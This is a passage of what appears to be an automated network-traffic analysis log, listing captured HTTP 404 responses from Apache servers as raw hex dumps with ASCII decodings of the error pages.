69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 Data Ascii: 285<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="robots" content="noindex,nofollow" /> <style> body { background-color: #fff; color: #222; font: 16px/1.5 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; margin: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:43 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:13:09 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:46 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:13:09 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 73 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 6f 2e 6a 70 2f 69 6d 61 67 65 73 2f 70 75 62 6c 69 63 2f 63 6f 6d 6d 6f 6e 2f 6c 6f 67 6f 2e 67 69 66 22 20 61 6c 74 3d 22 47 4d 4f 20 49 6e 74 65 72 6e 65 74 2c 20 49 6e 63 2e 22 3e 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 3c 68 31 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 65 74 61 69 6c 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 ef bc 88 55 52 4c ef bc 89 e3 81 af e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 61 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 61 6d 61 65 2d 73 65 72 76 65 72 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 20 e3 83 ac e3 83 b3 e3 82 bf e3 83 ab e3 82 b5 e3 83 bc e3 83 90 e3 83 bc e3 81 ae e3 83 88 e3 83 83 e3 83 97 e3 83 9a e3 83 bc e3 82 b8 e3 81 ab e6 88 bb e3 82 8b 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:48 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:13:09 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:51 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:13:09 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 73 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 6f 2e 6a 70 2f 69 6d 61 67 65 73 2f 70 75 62 6c 69 63 2f 63 6f 6d 6d 6f 6e 2f 6c 6f 67 6f 2e 67 69 66 22 20 61 6c 74 3d 22 47 4d 4f 20 49 6e 74 65 72 6e 65 74 2c 20 49 6e 63 2e 22 3e 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 3c 68 31 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 65 74 61 69 6c 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 ef bc 88 55 52 4c ef bc 89 e3 81 af e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 61 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 61 6d 61 65 2d 73 65 72 76 65 72 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 20 e3 83 ac e3 83 b3 e3 82 bf e3 83 ab e3 82 b5 e3 83 bc e3 83 90 e3 83 bc e3 81 ae e3 83 88 e3 83 83 e3 83 97 e3 83 9a e3 83 bc e3 82 b8 e3 81 ab e6 88 bb e3 82 8b 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Nov 2024 09:13:32 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq\|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9\|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZMm0>}\|)on:'RFBW+}c_0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Nov 2024 09:13:34 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq\|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9\|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZMm0>}\|)on:'RFBW+}c_0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Nov 2024 09:13:37 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq\|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9\|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZMm0>}\|)on:'RFBW+}c_0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Mon, 04 Nov 2024 09:13:39 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 